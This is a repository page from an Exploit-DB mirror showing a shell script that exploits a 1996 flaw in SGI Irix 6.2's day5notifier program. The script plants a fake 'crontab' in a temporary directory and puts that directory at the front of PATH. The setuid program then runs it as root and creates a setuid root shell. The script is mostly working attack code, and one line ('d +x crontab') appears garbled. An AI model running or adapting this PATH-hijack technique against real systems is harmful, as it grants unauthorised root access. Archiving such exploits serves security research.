bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/irix/local/19273.sh
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

35 lines
No EOL
903 B
Bash
Executable file
Raw Permalink Blame History

#!/bin/sh
#source: https://www.securityfocus.com/bid/345/info
#
#A vulnerability exists in the day5notifier program, shipped with Irix 6.2 from Silicon Graphics Inc. This program will allow any user to run any command as root.
#
#day5notifier wisely replaces a number of system() calls with execve() calls. However, the code was translated to run a copy of /bin/sh as the processor in the execve. As such, all the security problems associated with using a system() call in a setuid program remain.
#!/bin/sh
# reg4root - Register me for Root!
#
# Exploit a bug in SGI's Registration Software
#
# -Mike Neuman
# mcn@EnGarde.com
# 8/6/96
MYPWD=`pwd`
mkdir /tmp/emptydir.$$
cd /tmp/emptydir.$$
cat <<EOF >crontab
cp /bin/sh ./suidshell
chmod 4755 suidshell
EOF
d +x crontab
PATH=.:$PATH
export PATH
/var/www/htdocs/WhatsNew/CustReg/day5notifier -procs 0
./suidshell
cd $MYPWD
rm -rf /tmp/emptydir.$$
Reference in a new issue View git blame Copy permalink